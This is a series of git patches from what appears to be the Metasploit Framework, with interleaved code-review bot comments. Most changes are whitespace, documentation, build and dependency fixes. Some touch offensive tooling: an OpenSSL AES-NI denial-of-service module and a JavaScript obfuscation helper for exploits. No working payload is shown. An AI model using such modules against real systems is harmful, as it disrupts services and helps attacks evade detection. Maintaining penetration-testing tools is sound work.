Rex::Struct2::CStructTemplate.new( [ 'uint32v', 'Size', 0 ], [ 'uint32v', 'TimeDateStamp', 0 ], 
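Review bot: The comment block re-indented above `IMAGE_LOAD_TLS_DIRECTORY32` is the `IMAGE_LOAD_CONFIG_DIRECTORY32` typedef rather than a TLS directory, and the template's visible fields (`Size`, `TimeDateStamp`, …) follow that layout; the same applies to `IMAGE_LOAD_TLS_DIRECTORY64` in the next hunk. The Windows TLS directory (`IMAGE_TLS_DIRECTORY32`) is laid out differently, with `StartAddressOfRawData`, `EndAddressOfRawData`, `AddressOfIndex`, `AddressOfCallBacks`, `SizeOfZeroFill` and `Characteristics`, so anything parsed through this template would misread TLS data, including the callback table an analyst checks for code that runs before the entry point. If the template is unused, the doc comment should say so, e.g. `# NOTE: layout copied from IMAGE_LOAD_CONFIG_DIRECTORY32, not a real IMAGE_TLS_DIRECTORY32`; otherwise the fields need replacing. The template definition continues past the end of the hunk.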
@@ -926,30 +912,29 @@ class PeBase [ 'uint32v', 'SEHandlerCount', 0 ] ) - # - # typedef struct { - # ULONG Size; - # ULONG TimeDateStamp; - # USHORT MajorVersion; - # USHORT MinorVersion; - # ULONG GlobalFlagsClear; - # ULONG GlobalFlagsSet; - # ULONG CriticalSectionDefaultTimeout; - # ULONGLONG DeCommitFreeBlockThreshold; - # ULONGLONG DeCommitTotalFreeThreshold; - # ULONGLONG LockPrefixTable; // VA - # ULONGLONG MaximumAllocationSize; - # ULONGLONG VirtualMemoryThreshold; - # ULONGLONG ProcessAffinityMask; - # ULONG ProcessHeapFlags; - # USHORT CSDVersion; - # USHORT Reserved1; - # ULONGLONG EditList; // VA - # ULONGLONG SecurityCookie; // VA - # ULONGLONG SEHandlerTable; // VA - # ULONGLONG SEHandlerCount; - # } IMAGE_LOAD_CONFIG_DIRECTORY64, *PIMAGE_LOAD_CONFIG_DIRECTORY64; - # + # Struct + # typedef struct { + # ULONG Size; + # ULONG TimeDateStamp; + # USHORT MajorVersion; + # USHORT MinorVersion; + # ULONG GlobalFlagsClear; + # ULONG GlobalFlagsSet; + # ULONG CriticalSectionDefaultTimeout; + # ULONGLONG DeCommitFreeBlockThreshold; + # ULONGLONG DeCommitTotalFreeThreshold; + # ULONGLONG LockPrefixTable; // VA + # ULONGLONG MaximumAllocationSize; + # ULONGLONG VirtualMemoryThreshold; + # ULONGLONG ProcessAffinityMask; + # ULONG ProcessHeapFlags; + # USHORT CSDVersion; + # USHORT Reserved1; + # ULONGLONG EditList; // VA + # ULONGLONG SecurityCookie; // VA + # ULONGLONG SEHandlerTable; // VA + # ULONGLONG SEHandlerCount; + # } IMAGE_LOAD_CONFIG_DIRECTORY64, *PIMAGE_LOAD_CONFIG_DIRECTORY64; IMAGE_LOAD_TLS_DIRECTORY64 = Rex::Struct2::CStructTemplate.new( [ 'uint32v', 'Size', 0 ], [ 'uint32v', 'TimeDateStamp', 0 ], 
@@ -1014,14 +999,13 @@ class PeBase # ## - # - # typedef struct _IMAGE_RUNTIME_FUNCTION_ENTRY { - # DWORD BeginAddress; - # DWORD EndAddress; - # DWORD UnwindInfoAddress; - # } _IMAGE_RUNTIME_FUNCTION_ENTRY, *_PIMAGE_RUNTIME_FUNCTION_ENTRY; - # IMAGE_RUNTIME_FUNCTION_ENTRY_SZ = 12 + # Struct + # typedef struct _IMAGE_RUNTIME_FUNCTION_ENTRY { + # DWORD BeginAddress; + # DWORD EndAddress; + # DWORD UnwindInfoAddress; + # } _IMAGE_RUNTIME_FUNCTION_ENTRY, *_PIMAGE_RUNTIME_FUNCTION_ENTRY; IMAGE_RUNTIME_FUNCTION_ENTRY = Rex::Struct2::CStructTemplate.new( [ 'uint32v', 'BeginAddress', 0 ], [ 'uint32v', 'EndAddress', 0 ], @@ -1069,7 +1053,7 @@ class PeBase class UnwindInfo def initialize(pe, unwind_rva) data = pe.read_rva(unwind_rva, UNWIND_INFO_HEADER_SZ) - + unwind = UNWIND_INFO_HEADER.make_struct unwind.from_s(data) @@ -1115,26 +1099,26 @@ class PeBase def _load_exception_directory @exception = [] - + exception_entry = _optional_header['DataDirectory'][IMAGE_DIRECTORY_ENTRY_EXCEPTION] rva = exception_entry.v['VirtualAddress'] size = exception_entry.v['Size'] - + return if (rva == 0) - + data = _isource.read(rva_to_file_offset(rva), size) - + case hdr.file.Machine when IMAGE_FILE_MACHINE_AMD64 count = data.length / IMAGE_RUNTIME_FUNCTION_ENTRY_SZ - + count.times { |current| @exception << RuntimeFunctionEntry.new(self, data.slice!(0, IMAGE_RUNTIME_FUNCTION_ENTRY_SZ)) } else end - + return @exception end @@ -1651,7 +1635,7 @@ class PeBase rname.to_s end - + def update_checksum off = _dos_header.e_lfanew + IMAGE_FILE_HEADER_SIZE + 0x40 _isource.rawdata[off, 4] = [0].pack('V') From a57f04adb418ca112674d02d6df2c03ea2567a6c Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 5 Mar 2013 14:34:27 -0600 Subject: [PATCH 81/87] Exclude tests from documentation --- Rakefile | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/Rakefile b/Rakefile index a365eedfb9..d32e9352cb 100644 --- a/Rakefile +++ b/Rakefile 
@@ -16,11 +16,16 @@ namespace :yard do '-', 'COPYING', 'HACKING', - 'THIRD-PARTY.md' + 'LICENSE', + 'CONTRIBUTING.md', ] yard_options = [ # include documentation for protected methods for developers extending the code. - '--protected' + '--protected', + # Don't bother with files meant to be examples + '--exclude', 'samples/', + '--exclude', '\.ut\.rb/', + '--exclude', '\.ts\.rb/', ] YARD::Rake::YardocTask.new(:doc) do |t| From a928e5f963199e394c8402a17674035bb616cd4c Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 5 Mar 2013 14:34:56 -0600 Subject: [PATCH 82/87] Whitespace --- lib/msf/core/db.rb | 40 ++++++++++++++++++++-------------------- 1 file changed, 20 insertions(+), 20 deletions(-) diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index 9b5c8d8212..bd6d0e4d81 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -699,7 +699,7 @@ class DBManager if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule'] mod_fullname = sess_data[:datastore]['ParentModule'] mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name - else + else mod_name = mod.name mod_fullname = mod.fullname end @@ -719,7 +719,7 @@ class DBManager vuln_info[:service] = service if service vuln = framework.db.report_vuln(vuln_info) - + if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule'] via_exploit = sess_data[:datastore]['ParentModule'] else @@ -738,7 +738,7 @@ class DBManager } framework.db.report_exploit_success(attempt_info) - + end s @@ -871,7 +871,7 @@ class DBManager ref.to_s end }) - + # Try find a matching vulnerability vuln = find_vuln_by_refs(ref_objs, host, svc) end @@ -890,7 +890,7 @@ class DBManager attempt_info[:loot_id] = opts[:loot_id] if opts[:loot_id] vuln.vuln_attempts.create(attempt_info) - + # Correct the vuln's associated service if necessary if svc and vuln.service_id.nil? vuln.service = svc 
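Review bot: The two added patterns `'\.ut\.rb/'` and `'\.ts\.rb/'` in the Rakefile hunk end in a slash, so, assuming YARD treats `--exclude` values as regular expressions matched against the file path, they only match a path with a directory component ending in `.ut.rb` or `.ts.rb`. Files named `*.ut.rb` or `*.ts.rb` would still be documented, which seems contrary to the commit title. If the intent is to skip the test files themselves, anchor on the end of the path: `'--exclude', '\.ut\.rb$',` and `'--exclude', '\.ts\.rb$',`.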
@@ -909,12 +909,12 @@ class DBManager attempt_info[:vuln_id] = vuln.id if vuln attempt_info[:session_id] = opts[:session_id] if opts[:session_id] attempt_info[:loot_id] = opts[:loot_id] if opts[:loot_id] - + if svc attempt_info[:port] = svc.port attempt_info[:proto] = svc.proto end - + if port and svc.nil? attempt_info[:port] = port attempt_info[:proto] = prot || "tcp" @@ -937,7 +937,7 @@ class DBManager timestamp = opts.delete(:timestamp) freason = opts.delete(:fail_reason) - fdetail = opts.delete(:fail_detail) + fdetail = opts.delete(:fail_detail) username = opts.delete(:username) mname = opts.delete(:module) @@ -968,7 +968,7 @@ class DBManager ref.to_s end }) - + # Try find a matching vulnerability vuln = find_vuln_by_refs(ref_objs, host, svc) end @@ -1003,7 +1003,7 @@ class DBManager attempt_info[:port] = svc.port attempt_info[:proto] = svc.proto end - + if port and svc.nil? attempt_info[:port] = port attempt_info[:proto] = prot || "tcp" @@ -1018,7 +1018,7 @@ class DBManager ::ActiveRecord::Base.connection_pool.with_connection { return if not vuln info = {} - + # Opts can be keyed by strings or symbols ::Mdm::VulnAttempt.column_names.each do |kn| k = kn.to_sym @@ -1037,7 +1037,7 @@ class DBManager ::ActiveRecord::Base.connection_pool.with_connection { return if not host info = {} - + # Opts can be keyed by strings or symbols ::Mdm::VulnAttempt.column_names.each do |kn| k = kn.to_sym @@ -1623,7 +1623,7 @@ class DBManager # If a match is found on a vulnerability with no associated service, # update that vulnerability with our service information. This helps # prevent dupes of the same vuln found by both local patch and - # service detection. + # service detection. if rids and rids.length > 0 vuln = find_vuln_by_refs(rids, host, service) vuln.service = service if vuln @@ -1651,7 +1651,7 @@ class DBManager else vuln = host.vulns.find_by_name(name) end - + unless vuln vinf = { 
@@ -1660,7 +1660,7 @@ class DBManager :info => info } - vinf[:service_id] = service.id if service + vinf[:service_id] = service.id if service vuln = Mdm::Vuln.create(vinf) end end @@ -1681,7 +1681,7 @@ class DBManager # Handle vuln_details parameters report_vuln_details(vuln, details) if details - + vuln } end @@ -4196,9 +4196,9 @@ class DBManager # Takes an array of vuln hashes, as returned by the NeXpose rawxml stream # parser, like: # [ - # {"id"=>"winreg-notes-protocol-handler", severity="8", "refs"=>[{"source"=>"BID", "value"=>"10600"}, ...]} - # {"id"=>"windows-zotob-c", severity="8", "refs"=>[{"source"=>"BID", "value"=>"14513"}, ...]} - # ] + # {"id"=>"winreg-notes-protocol-handler", severity="8", "refs"=>[{"source"=>"BID", "value"=>"10600"}, ...]} + # {"id"=>"windows-zotob-c", severity="8", "refs"=>[{"source"=>"BID", "value"=>"14513"}, ...]} + # ] # and transforms it into a struct, containing :id, :refs, :title, and :severity # # Other attributes can be added later, as needed. @@ -5095,7 +5095,7 @@ class DBManager # # This method normalizes an incoming service name to one of the # the standard ones recognized by metasploit - # + # def service_name_map(proto) return proto unless proto.kind_of? String case proto.downcase From 3acccd71f7ff0beb07af0140044066a2c80dd3dd Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 5 Mar 2013 14:35:27 -0600 Subject: [PATCH 83/87] Whitespace and doc fix --- lib/rex/exploitation/obfuscatejs.rb | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/lib/rex/exploitation/obfuscatejs.rb b/lib/rex/exploitation/obfuscatejs.rb index 94e17c06dc..70db94e338 100644 --- a/lib/rex/exploitation/obfuscatejs.rb +++ b/lib/rex/exploitation/obfuscatejs.rb 
@@ -18,12 +18,12 @@ class ObfuscateJS # # The 'Symbols' argument should have the following format: # - # { - # 'Variables' => [ 'var1', ... ], - # 'Methods' => [ 'method1', ... ], - # 'Namespaces' => [ 'n', ... ], - # 'Classes' => [ { 'Namespace' => 'n', 'Class' => 'y'}, ... ] - # } + # { + # 'Variables' => [ 'var1', ... ], + # 'Methods' => [ 'method1', ... ], + # 'Namespaces' => [ 'n', ... ], + # 'Classes' => [ { 'Namespace' => 'n', 'Class' => 'y'}, ... ] + # } # # Make sure you order your methods, classes, and namespaces by most # specific to least specific to prevent partial substitution. For @@ -138,14 +138,14 @@ class ObfuscateJS # while (buf.length < len) # buf << set[rand(set.length)].chr # end - # + # # buf #} end # Remove our comments remove_comments - + # Globally replace symbols replace_symbols(@opts['Symbols']) if @opts['Symbols'] @@ -191,9 +191,9 @@ protected next if symbols[symtype].nil? symbols[symtype].each { |sym| dyn = Rex::Text.rand_text_alpha(rand(32)+1) until dyn and not taken.key?(dyn) - + taken[dyn] = true - + if symtype == 'Classes' full_sym = sym['Namespace'] + "." + sym['Class'] @dynsym[full_sym] = dyn From 709ec8a519ad81c1469aea1205402a7c816b26b6 Mon Sep 17 00:00:00 2001 From: Brandon Turner Date: Tue, 5 Mar 2013 14:41:09 -0600 Subject: [PATCH 84/87] Use start.sh to start Pro via msfupdate command start.sh (installed with community/pro on apt installs) automatically starts dependency services (such as postgresql). --- msfupdate | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/msfupdate b/msfupdate index 029b80b566..d32010e5fb 100755 --- a/msfupdate +++ b/msfupdate 
@@ -224,7 +224,10 @@ if is_apt else $stdout.puts "[*] Updating to version #{pro_version || framework_version}" system("apt-get", "install", "--assume-yes", *packages) - system("/etc/init.d/metasploit start") if packages.include?('metasploit') + if packages.include?('metasploit') + start_cmd = File.expand_path(File.join(@msfbase_dir, '..', '..', '..', 'scripts', 'start.sh')) + system(start_cmd) if ::File.executable_real? start_cmd + end end end From 781132b1cfe6ee08d13549a7f80bcdb03d5ea1c1 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 5 Mar 2013 22:41:16 +0100 Subject: [PATCH 85/87] cleanup for openssl_aesni --- modules/auxiliary/dos/ssl/openssl_aesni.rb | 21 ++++++++++++--------- 1 file changed, 12 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/dos/ssl/openssl_aesni.rb b/modules/auxiliary/dos/ssl/openssl_aesni.rb index 94ba11e470..f118a88abb 100644 --- a/modules/auxiliary/dos/ssl/openssl_aesni.rb +++ b/modules/auxiliary/dos/ssl/openssl_aesni.rb @@ -9,15 +9,18 @@ class Metasploit4 < Msf::Auxiliary super(update_info(info, 'Name' => 'OpenSSL TLS 1.1 and 1.2 AES-NI DoS', 'Description' => %q{ - The AES-NI implementation of OpenSSL 1.0.1c does not - properly compute the length of an encrypte message when used - with a TLS version 1.1 or above. This leads to an integer - underflow which can cause a DoS. + The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the + length of an encrypted message when used with a TLS version 1.1 or above. This + leads to an integer underflow which can cause a DoS. The vulnerable function + aesni_cbc_hmac_sha1_cipher is only included in the 64 bits versions of OpenSSL. + This module has been tested successfully on Ubuntu 12.04 (64 bits) with the default + OpenSSL 1.0.1c package. }, - 'Author' => [ - 'Wolfgang Ettlinger ' - ], - 'License' => BSD_LICENSE, + 'Author' => + [ + 'Wolfgang Ettlinger ' + ], + 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2012-2686'], 
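Review bot: In the `if packages.include?('metasploit')` branch, `system(start_cmd) if ::File.executable_real? start_cmd` does nothing and prints nothing when `start.sh` is missing or not executable, so an update can finish with the service left stopped, whereas the removed line always attempted `/etc/init.d/metasploit start`. Report the skipped start, for example `$stderr.puts "[-] #{start_cmd} not found or not executable; start Metasploit manually" unless ::File.executable_real?(start_cmd)`, and check the return value of `system`. Because this runs right after `apt-get install`, presumably as root, it is also worth confirming that the `scripts` directory resolved three levels above `@msfbase_dir` is writable only by root. The enclosing `if is_apt` block begins outside the hunk.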
@@ -138,7 +141,7 @@ class Metasploit4 < Msf::Auxiliary connect sock.put(p1) - resp = sock.recv(4096) + resp = sock.get_once cs = get_cipher_suite(resp) From 36e20807b04c0a701a0d984fa40e97541a9250a5 Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Wed, 6 Mar 2013 09:53:26 -0600 Subject: [PATCH 86/87] Update Gemfile to metaploit_data_models 0.6.0 [#44034071] --- Gemfile | 2 +- Gemfile.lock | 8 ++++---- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/Gemfile b/Gemfile index 9513b0a497..251808c2a5 100755 --- a/Gemfile +++ b/Gemfile @@ -7,7 +7,7 @@ gem 'activerecord' # Needed for some admin modules (scrutinizer_add_user.rb) gem 'json' # Database models shared between framework and Pro. -gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.5.1' +gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.6.0' # Needed by msfgui and other rpc components gem 'msgpack' # Needed by anemone crawler diff --git a/Gemfile.lock b/Gemfile.lock index 983117cbb4..c16a1cca2f 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,9 +1,9 @@ GIT remote: git://github.com/rapid7/metasploit_data_models.git - revision: 1e3e0c2effb8e1bb6cec9683b830e4244babf706 - tag: 0.5.1 + revision: 0285d6e199f125b33214100dcb0f4eeb12ee765f + tag: 0.6.0 specs: - metasploit_data_models (0.5.1) + metasploit_data_models (0.6.0) activerecord (>= 3.2.10) activesupport pg @@ -55,7 +55,7 @@ GEM simplecov-html (~> 0.5.3) simplecov-html (0.5.3) slop (3.4.3) - tzinfo (0.3.35) + tzinfo (0.3.36) yard (0.8.3) PLATFORMS From fac941aae479c2795fd7dfec949d8e51765d4774 Mon Sep 17 00:00:00 2001 
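Review bot: `resp = sock.get_once` can return nil when nothing arrives before the timeout, and the next line passes `resp` straight to `get_cipher_suite`, whose handling of nil is not visible in this hunk. Unless that helper already guards against it, the module would stop with a NoMethodError instead of reporting that no reply arrived. A guard directly after the read, such as `return print_error("No response from the server") unless resp`, keeps the failure readable. The surrounding method starts and ends outside the hunk.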
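Review bot: The bumped `gem 'metasploit_data_models'` line in the Gemfile still fetches the dependency over `git://`, a transport with no encryption or server authentication, so the fetched content is not protected in transit, and a tag such as `0.6.0` can be moved upstream. Prefer `:git => 'https://github.com/rapid7/metasploit_data_models.git'` here and in the `remote:` entry of Gemfile.lock. The `revision:` recorded in Gemfile.lock limits the exposure for locked installs, so that hash should be checked against the upstream tag whenever it changes, as it does in this commit.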
From: Luke Imhoff Date: Wed, 6 Mar 2013 09:59:09 -0600 Subject: [PATCH 87/87] Update gemcache with metasploit_data_models 0.6.0 [#44034071] --- .../metasploit_data_models-0.5.1/Rakefile | 20 -- .../base64_serializer.rb | 35 ---- .../lib/metasploit_data_models/engine.rb | 7 - .../spec/lib/base64_serializer_spec.rb | 22 --- .../.gitignore | 0 .../.rspec | 0 .../.simplecov | 0 .../.yardopts | 0 .../Gemfile | 3 + .../LICENSE | 0 .../README.md | 0 .../metasploit_data_models-0.6.0/Rakefile | 34 ++++ .../app/models/mdm/api_key.rb | 0 .../app/models/mdm/client.rb | 0 .../app/models/mdm/cred.rb | 0 .../app/models/mdm/event.rb | 0 .../app/models/mdm/exploit_attempt.rb | 0 .../app/models/mdm/exploited_host.rb | 0 .../app/models/mdm/host.rb | 0 .../app/models/mdm/host_detail.rb | 0 .../app/models/mdm/host_tag.rb | 0 .../app/models/mdm/imported_cred.rb | 0 .../app/models/mdm/listener.rb | 0 .../app/models/mdm/loot.rb | 0 .../app/models/mdm/macro.rb | 0 .../app/models/mdm/mod_ref.rb | 0 .../app/models/mdm/module_action.rb | 0 .../app/models/mdm/module_arch.rb | 0 .../app/models/mdm/module_author.rb | 0 .../app/models/mdm/module_detail.rb | 0 .../app/models/mdm/module_mixin.rb | 0 .../app/models/mdm/module_platform.rb | 0 .../app/models/mdm/module_ref.rb | 0 .../app/models/mdm/module_target.rb | 0 .../app/models/mdm/nexpose_console.rb | 0 .../app/models/mdm/note.rb | 0 .../app/models/mdm/profile.rb | 0 .../app/models/mdm/ref.rb | 0 .../app/models/mdm/report.rb | 0 .../app/models/mdm/report_template.rb | 0 .../app/models/mdm/route.rb | 0 .../app/models/mdm/service.rb | 0 .../app/models/mdm/session.rb | 0 .../app/models/mdm/session_event.rb | 0 .../app/models/mdm/tag.rb | 0 .../app/models/mdm/task.rb | 0 .../app/models/mdm/user.rb | 7 - .../app/models/mdm/vuln.rb | 0 .../app/models/mdm/vuln_attempt.rb | 0 .../app/models/mdm/vuln_detail.rb | 0 .../app/models/mdm/vuln_ref.rb | 0 .../app/models/mdm/web_form.rb | 0 .../app/models/mdm/web_page.rb | 0 .../app/models/mdm/web_site.rb | 0 
.../app/models/mdm/web_vuln.rb | 55 +++++- .../app/models/mdm/wmap_request.rb | 0 .../app/models/mdm/wmap_target.rb | 0 .../app/models/mdm/workspace.rb | 0 .../bin/mdm_console | 0 .../console_db.yml | 0 .../db/migrate/000_create_tables.rb | 0 .../db/migrate/001_add_wmap_tables.rb | 0 .../db/migrate/002_add_workspaces.rb | 0 .../db/migrate/003_move_notes.rb | 0 .../db/migrate/004_add_events_table.rb | 0 .../db/migrate/005_expand_info.rb | 0 .../db/migrate/006_add_timestamps.rb | 0 .../db/migrate/007_add_loots.rb | 0 .../db/migrate/008_create_users.rb | 0 .../db/migrate/009_add_loots_ctype.rb | 0 .../db/migrate/010_add_alert_fields.rb | 0 .../db/migrate/011_add_reports.rb | 0 .../db/migrate/012_add_tasks.rb | 0 .../db/migrate/013_add_tasks_result.rb | 0 .../db/migrate/014_add_loots_fields.rb | 0 .../db/migrate/015_rename_user.rb | 0 .../db/migrate/016_add_host_purpose.rb | 0 .../db/migrate/017_expand_info2.rb | 0 .../db/migrate/018_add_workspace_user_info.rb | 0 .../db/migrate/019_add_workspace_desc.rb | 0 .../db/migrate/020_add_user_preferences.rb | 0 .../migrate/021_standardize_info_and_data.rb | 0 .../db/migrate/022_enlarge_event_info.rb | 0 .../migrate/023_add_report_downloaded_at.rb | 0 .../024_convert_service_info_to_text.rb | 0 .../db/migrate/025_add_user_admin.rb | 0 .../db/migrate/026_add_creds_table.rb | 0 .../20100819123300_migrate_cred_data.rb | 0 .../20100824151500_add_exploited_table.rb | 0 .../20100908001428_add_owner_to_workspaces.rb | 0 .../20100911122000_add_report_templates.rb | 0 .../20100916151530_require_admin_flag.rb | 0 ...00916175000_add_campaigns_and_templates.rb | 0 .../20100920012100_add_generate_exe_column.rb | 0 .../20100926214000_add_template_prefs.rb | 0 .../migrate/20101001000000_add_web_tables.rb | 0 .../db/migrate/20101002000000_add_query.rb | 0 .../migrate/20101007000000_add_vuln_info.rb | 0 ...20101008111800_add_clients_to_campaigns.rb | 0 ...20101009023300_add_campaign_attachments.rb | 0 .../20101104135100_add_imported_creds.rb | 
0 .../migrate/20101203000000_fix_web_tables.rb | 0 .../20101203000001_expand_host_comment.rb | 0 ...2033_add_limit_to_network_to_workspaces.rb | 0 ...20110112154300_add_module_uuid_to_tasks.rb | 0 .../migrate/20110204112800_add_host_tags.rb | 0 .../20110317144932_add_session_table.rb | 0 ...414180600_add_local_id_to_session_table.rb | 0 .../20110415175705_add_routes_table.rb | 0 .../migrate/20110422000000_convert_binary.rb | 0 ...0110425095900_add_last_seen_to_sessions.rb | 0 ...0110513143900_track_successful_exploits.rb | 0 ...517160800_rename_and_prune_nessus_vulns.rb | 0 ...0527000000_add_task_id_to_reports_table.rb | 0 .../20110527000001_add_api_keys_table.rb | 0 .../20110606000001_add_macros_table.rb | 0 ...10622000000_add_settings_to_tasks_table.rb | 0 .../20110624000001_add_listeners_table.rb | 0 ...0625000001_add_macro_to_listeners_table.rb | 0 ...110630000001_add_nexpose_consoles_table.rb | 0 ...0002_add_name_to_nexpose_consoles_table.rb | 0 .../20110717000001_add_profiles_table.rb | 0 ...20110727163801_expand_cred_ptype_column.rb | 0 .../20110730000001_add_initial_indexes.rb | 0 .../migrate/20110812000001_prune_indexes.rb | 0 .../db/migrate/20110922000000_expand_notes.rb | 0 .../20110928101300_add_mod_ref_table.rb | 0 ...10000_add_display_name_to_reports_table.rb | 0 .../db/migrate/20111203000000_inet_columns.rb | 0 .../20111204000000_more_inet_columns.rb | 0 .../20111210000000_add_scope_to_hosts.rb | 0 ...0120126110000_add_virtual_host_to_hosts.rb | 0 ...20120411173220_rename_workspace_members.rb | 0 ...20601152442_add_counter_caches_to_hosts.rb | 0 .../20120625000000_add_vuln_details.rb | 0 .../20120625000001_add_host_details.rb | 0 .../migrate/20120625000002_expand_details.rb | 0 .../migrate/20120625000003_expand_details2.rb | 0 .../20120625000004_add_vuln_attempts.rb | 0 ...000005_add_vuln_and_host_counter_caches.rb | 0 .../20120625000006_add_module_details.rb | 0 .../20120625000007_add_exploit_attempts.rb | 0 .../20120625000008_add_fail_message.rb | 
0 ...2805_add_owner_and_payload_to_web_vulns.rb | 0 ...ired_columns_to_null_false_in_web_vulns.rb | 0 .../lib/mdm.rb | 0 .../host/operating_system_normalization.rb | 0 .../lib/metasploit_data_models.rb | 0 .../base64_serializer.rb | 103 +++++++++++ .../lib/metasploit_data_models/engine.rb | 14 ++ .../serialized_prefs.rb | 0 .../validators/ip_format_validator.rb | 0 .../password_is_strong_validator.rb | 0 .../lib/metasploit_data_models/version.rb | 2 +- .../lib/tasks/yard.rake | 0 .../metasploit_data_models.gemspec | 0 .../script/rails | 0 .../spec/app/models/mdm/web_vuln_spec.rb | 41 ++++- .../spec/dummy/Rakefile | 0 .../app/assets/javascripts/application.js | 0 .../app/assets/stylesheets/application.css | 0 .../app/controllers/application_controller.rb | 0 .../dummy/app/helpers/application_helper.rb | 0 .../spec/dummy/app/mailers/.gitkeep | 0 .../spec/dummy/app/models/.gitkeep | 0 .../app/views/layouts/application.html.erb | 0 .../spec/dummy/config.ru | 0 .../spec/dummy/config/application.rb | 0 .../spec/dummy/config/boot.rb | 0 .../spec/dummy/config/database.yml.example | 0 .../spec/dummy/config/environment.rb | 0 .../dummy/config/environments/development.rb | 0 .../dummy/config/environments/production.rb | 0 .../spec/dummy/config/environments/test.rb | 0 .../initializers/backtrace_silencers.rb | 0 .../dummy/config/initializers/inflections.rb | 0 .../dummy/config/initializers/mime_types.rb | 0 .../dummy/config/initializers/secret_token.rb | 0 .../config/initializers/session_store.rb | 0 .../config/initializers/wrap_parameters.rb | 0 .../spec/dummy/config/routes.rb | 0 .../spec/dummy/db/schema.rb | 0 .../spec/dummy/lib/assets/.gitkeep | 0 .../spec/dummy/log/.gitkeep | 0 .../spec/dummy/public/404.html | 0 .../spec/dummy/public/422.html | 0 .../spec/dummy/public/500.html | 0 .../spec/dummy/public/favicon.ico | 0 .../spec/dummy/script/rails | 0 .../spec/factories/mdm/addresses.rb | 7 + .../spec/factories/mdm/hosts.rb | 18 ++ .../spec/factories/mdm/services.rb | 35 
++++ .../spec/factories/mdm/users.rb | 22 +++ .../spec/factories/mdm/web_sites.rb | 8 + .../spec/factories/mdm/web_vulns.rb | 64 +++++++ .../spec/factories/mdm/workspaces.rb | 23 +++ .../spec/lib/base64_serializer_spec.rb | 174 ++++++++++++++++++ .../spec/spec_helper.rb | 9 + ...c => metasploit_data_models-0.6.0.gemspec} | 4 +- 199 files changed, 608 insertions(+), 99 deletions(-) delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Rakefile delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/base64_serializer.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/engine.rb delete mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/lib/base64_serializer_spec.rb rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/.gitignore (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/.rspec (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/.simplecov (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/.yardopts (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/Gemfile (79%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/LICENSE (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/README.md (100%) create mode 100755 lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Rakefile rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/api_key.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/client.rb (100%) rename 
lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/event.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/exploit_attempt.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/exploited_host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/host_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/host_tag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/imported_cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/listener.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => metasploit_data_models-0.6.0}/app/models/mdm/loot.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.5.1 => 